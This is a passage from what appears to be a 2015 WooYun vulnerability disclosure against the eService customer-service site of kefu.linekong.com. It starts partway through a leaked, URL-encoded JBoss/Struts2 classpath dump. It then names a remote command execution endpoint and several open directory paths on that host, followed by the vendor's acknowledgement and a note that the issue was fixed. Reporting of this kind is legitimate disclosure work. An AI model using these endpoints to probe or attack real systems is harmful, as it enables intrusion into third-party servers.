2Ftmp%2Fdeploy%2Ftmp5913486598487930136trove.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fcommons-io-1.3.2.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp2498765583516090332tomcat-http.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fdwr-1.1-beta-3.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp8171336813031228483axis-ws4ee.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp6336219452933413902antlr-2.7.5H3.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fcommons-httpclient-3.1.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fhsqldb.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fognl-2.6.11.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp3332293537302222734catalina.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fhsqldb-plugin.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5458039299239960074tomcat-ajp.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fcommons-collections-3.1.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp4440913937618162919cglib-2.1.jar%3A%2Fusr%2Fjava%2Fjdk1.6.0_25%2Fjre%2Flib%2Fext%2Fsunjce_provider.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp6346206992602066763jboss-aop.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp4079816805034329639jboss-local-jdbc.rar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp3151033304315455207jboss-xa-jdbc.rar-contents%2Fjboss-xa-jdbc.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Ffreemarker-2.3.8.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Flog4j-1.2.8.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fcommons-httpclient.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Flib%2Fconcurrent.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fcommons-logging.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Fclasses%2F%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fxmlrpc-2.0.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp3702522107702055184commons-modeler.jar%3A%2Fusr%2Fjava%2Fjdk1.6.0_25%2Fjre%2Flib%2Fext%2Fdnsns.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fjdom.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fbsh-1.3.0.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjboss-j2ee.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fstruts2-codebehind-plugin-2.0.11.2.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp1099151691146069103wsdl4j.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp6237404052211161026naming-resources.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Flib%2Fendorsed%2Fxalan.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fezmorph-1.0.6.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp4325827586775467154mail-ra.rar-contents%2Fmail-ra.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp393639702798507697commons-discovery.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Foro-2.0.8.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fcommons-lang-2.3.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fmail.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjpl-pattern.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Flib%2Fendorsed%2FxercesImpl.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fmail-plugin.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp7318690147406926801jboss-ha-local-jdbc.rar-contents%2Fjboss-ha-local-jdbc.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Fdeploy%2Fjboss-hibernate.deployer%2F%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjboss.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2F%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Factivation.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjnpserver.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fscheduler-plugin-example.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjboss-jaxrpc.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fstruts2-core-2.0.11.2.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Fdeploy%2Fjbossweb-tomcat55.sar%2FROOT.war%2F%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjboss-saaj.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Fconf%2F%3A%2Fusr%2Fjava%2Fjdk1.6.0_25%2Flib%2Ftools.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjbossmq.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp6144956477623102918catalina-manager.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp8301739402364757125tomcat-util.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fscout.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fproperties-plugin.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp3285496549751174622jboss-aspect-library.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjavax.servlet.jsp.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fantlr-2.7.2.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Flib%2Fgnu-regexp.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fstruts2-pell-multipart-plugin-2.0.11.2.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5900502660985595292catalina-optional.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fcommons-fileupload-1.2.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjboss-transaction.jar%2C+org.apache.catalina.WELCOME_FILES%3D%5BLjava.lang.String%3B%40114d662%2C+org.apache.catalina.resources%3Dorg.apache.naming.resources.ProxyDirContext%40106c6be%7D"


二、远程命令执行漏洞
地址:http://kefu.linekong.com/eService/struts/webconsole.html

QQ图片20150623145742.png


三、任意目录访问
http://kefu.linekong.com/eService/css/
http://kefu.linekong.com/eService/download/
http://kefu.linekong.com/eService/images/
http://kefu.linekong.com/eService/js/

QQ图片20150623150147.png

修复方案:

版权声明:转载请注明来源 Ysql404@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-06-24 12:53

厂商回复:

感谢指出的问题,已交由开发人员处理

最新状态:

2015-07-01:已恢复